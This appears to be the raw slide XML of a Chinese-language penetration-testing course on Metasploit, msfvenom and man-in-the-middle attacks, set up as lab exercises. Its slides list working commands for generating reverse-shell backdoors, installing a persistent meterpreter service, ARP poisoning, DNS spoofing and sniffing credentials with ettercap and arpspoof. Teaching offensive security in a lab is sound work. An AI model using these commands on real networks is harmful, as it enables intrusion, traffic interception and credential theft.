              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736600" y="1583267"/>
            <a:ext cx="10783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udf mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提权</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>searchsploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索提权脚本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="813748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B7615-C7A9-4461-A898-D6F7C5DE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msfvenom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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AEED31-44EB-40BA-A5C6-7DEEC2C4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1D260F-AE21-4299-A69F-9DE11A4D5D9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753533" y="1422400"/>
            <a:ext cx="1076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msfvenom -l payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP  -f exe -o /root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>桌面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/test.exe  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>生成后门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76D2A4-7F0D-4CD9-BB1C-858EB31F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152201"/>
            <a:ext cx="8038095" cy="3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3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E74A9-A447-4812-A8F0-8E5BF5E4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中间人攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上节课实验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A7D94-3FB4-4B5C-AF88-1747BA8D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2F0E95-43C4-42D2-B8F9-030C76E3F2BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1695236"/>
            <a:ext cx="9645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实例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用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>毒化，重定向受害者的流量传送给攻击者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arpspoof -i eth0 -t 192.168.1.5 192.168.1.1</a:t>
            </a:r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第二个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>毒化攻击，使网关的数据重定向到攻击者的机器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arpspoof -i eth0 -t 192.168.1.1 192.168.1.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>验证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driftnet -i eth0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87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D48CAA-E879-4C32-B1A3-A91D02E4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888269"/>
            <a:ext cx="6542857" cy="14190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68CF60-7488-4CE4-8FE8-83148BDC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msfvenom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实例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7BA6F2-2F2B-43E7-8AC0-ADB65D8B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3FC6BA-28E2-4A6D-ACBB-F5AFF72F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45F196-01F7-441E-8663-5A3C559F5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817680"/>
            <a:ext cx="9495238" cy="533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3E31F96-5CBF-479A-9CAC-F1EFF1F8B6EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="791110" y="1243173"/>
            <a:ext cx="93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生成后门，反向连接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CDD8ED-1B58-44DC-8DD8-AEA58A44642C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="2434975"/>
            <a:ext cx="9495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利用后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2663990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68028-25BD-40D4-8066-ED993B93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msfvenom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后门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05B20-88B0-4CBB-A0FA-CE99EECB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BCECE7-9EBD-46A4-9239-E73C3BF0C7E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1492112"/>
            <a:ext cx="1076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linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>后门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2E7577-1E6F-4004-94EC-A56044D228EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="2828835"/>
            <a:ext cx="10850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Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f exe &gt; shell.exe</a:t>
            </a:r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8D13CB3-4EBE-4116-83BA-4578C029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110570"/>
            <a:ext cx="9647619" cy="4285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84A94F0-E17E-405C-B4D5-5342A9E85396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="4212404"/>
            <a:ext cx="964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script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后门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55AADC-285B-4E8D-9DD5-54CB99D16D91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="4718809"/>
            <a:ext cx="9647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msfvenom -p cmd/unix/reverse_perl LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.pl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90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7E06F-6BE1-494E-9E17-46A41F02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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>维持权限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E224A-1AA4-48D3-81AB-F6BC0C02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81A996-82F6-444B-A0E2-1FB905174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190249"/>
            <a:ext cx="4274609" cy="21042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A4CB12-CC7E-4751-B2BF-1541D8D59723}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="3530600"/>
            <a:ext cx="1059920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meterpreter run metsvc –A                        //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上传服务后门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msf &gt; use exploit/multi/handler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msf exploit(handler) &gt; set payload windows/metsvc_bind_tcp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payload =&gt; windows/metsvc_bind_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>msf exploit(handler) &gt; set LPORT31337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>LPORT =&gt; 31337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>msf exploit(handler) &gt; set RHOST192.168.0.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>RHOST =&gt; 192.168.0.128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59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E12D3-C4DD-48C6-82F5-319F179E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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自动化攻击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EAB148-46CE-400C-BD77-232FA6F3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6C2439-E692-4D9B-9F65-47CECB0B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7" y="2013971"/>
            <a:ext cx="5000000" cy="2095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6C9DA8-33E0-4CB2-B8A6-0C69AAD7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91" y="5094480"/>
            <a:ext cx="4990476" cy="15238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1695C9-1C5F-4684-B5E3-78C14EE5CB45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576791" y="1270000"/>
            <a:ext cx="49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字符串截取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08E7F7-DEC1-4480-A506-7C9B03A5336E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567267" y="4360333"/>
            <a:ext cx="4990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调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136151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C9D66-48B2-41AF-AD2B-E57B58CF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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自动攻击实战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48F5F5-F69D-455C-A8AC-7AE3759B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96B584-AAE4-4F40-B187-0AADEDFC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897566"/>
            <a:ext cx="9780952" cy="25142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0948B2-57D3-4200-A21F-61BE009C3FDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1278467"/>
            <a:ext cx="995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metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自动攻击脚本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72931E-92F6-491D-A677-449754E6EFF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771524" y="4622800"/>
            <a:ext cx="866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思考：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如何实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击成功后，自动创建会话，把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>flag.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>打印出来</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1470211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700" b="0"/>
              <a:t>谢谢</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700" b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2017/11/19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23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0C15A-D56C-4987-BEB0-D6298B0A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中间人攻击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93AE1-155B-43ED-8AFE-5B56C60B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964A3D-22E1-4905-9969-05AB7623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14E983-97FD-4FB5-98C6-E1EF0DAF5097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585627" y="1684962"/>
            <a:ext cx="10531011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Open Sans Semibold" panose="020B0706030804020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans Semibold" panose="020B0706030804020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>实例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap -Tqi eth0 -M ARP // //   		            	  #arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>毒化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eth0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>所在的网段，安静模式文本显示</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap -Tzq /10.0.0.1/21,22,23  -w hack.pcap         	  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>10.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>并保存到本地</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap -Tq -P dns_spoof -M arp /192.168.1.120// //	  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>192.168.1.120</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>欺骗，使用默认网卡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eth0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap -Tqi eth0 -L sniffed_data -F filter.ef -M arp:remote /10.0.0.2/80 //     #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>使用过滤并监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>10.0.0.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口的所有通信，安静模式文本显示，保存数据到本地</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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0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C14B2-6599-4199-8503-449220A4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中间人攻击实验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A20A53-7942-4D79-94C8-6CDBEEA8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3A8191-CAF9-4B69-AEF1-352E963278E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760288" y="1849348"/>
            <a:ext cx="102536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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>转发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受害者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ip 192.168.1.6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN"/>
              <a:t>ettercap -T -q -M ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN"/>
              <a:t>/192.168.1.6/ ///</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>driftnet -i eth0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/etc/ettercap/etter.dns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap -Tq -P dns_spoof -M arp /192.168.1.120// ///</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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3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6E1CE-FFB7-427C-B915-D32C96A3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dsniff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击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D543C-6B27-49C8-9187-86C3D23F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111C05-3627-4868-A2D2-F002FC5C4C26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1756881"/>
            <a:ext cx="1085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Open Sans Semibold" panose="020B0706030804020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans Semibold" panose="020B0706030804020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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+mn-lt"/>
              </a:rPr>
              <a:t>ettercap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap -Tq -P dns_spoof -M arp //192.168.1.120/ //</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>root@kali:~# driftnet -i eth0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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Open Sans Semibold" panose="020B0706030804020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans Semibold" panose="020B0706030804020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>arpspoof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>arpspoof -i eth0 -t 192.168.1.1 192.168.1.12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>root@kali:~# driftnet -i eth0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8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7DAFE-8588-44F7-A24E-8E2BF2DD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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目录结构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555F9-A4BD-4C66-B3BF-BFED51A0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72743A-2CCC-4B11-8DC7-31BA70FFF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96" y="5364107"/>
            <a:ext cx="5114286" cy="409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E98FC1-1270-4B88-916C-BE10738D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6" y="5874303"/>
            <a:ext cx="9578446" cy="6407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A40463-BF9A-4485-B46E-2016684A2481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584200" y="1371600"/>
            <a:ext cx="10850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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.offensive-security.com/metasploit-unleashed/filesystem-and-libraries/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C866B0-6F81-42A3-8095-09ECBB639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25" y="2174017"/>
            <a:ext cx="6114286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7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883F3-48FD-4DF1-B041-86C5E2B8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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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564420-0F49-4B4E-B9EF-6F333C0F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BB042B-7950-4CAD-BC7C-BF7CD3D61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687" y="1852612"/>
            <a:ext cx="5200650" cy="3838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75962F-9972-42AE-BF6F-4B0BB1CEA3D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1404073"/>
            <a:ext cx="53162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分为辅助模块（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Aux)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>渗透攻击模块 （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Exploits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后渗透攻击模块 （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Post) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击载荷模块（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>payloads)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码器模块（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Encoders)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>空指令模块（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
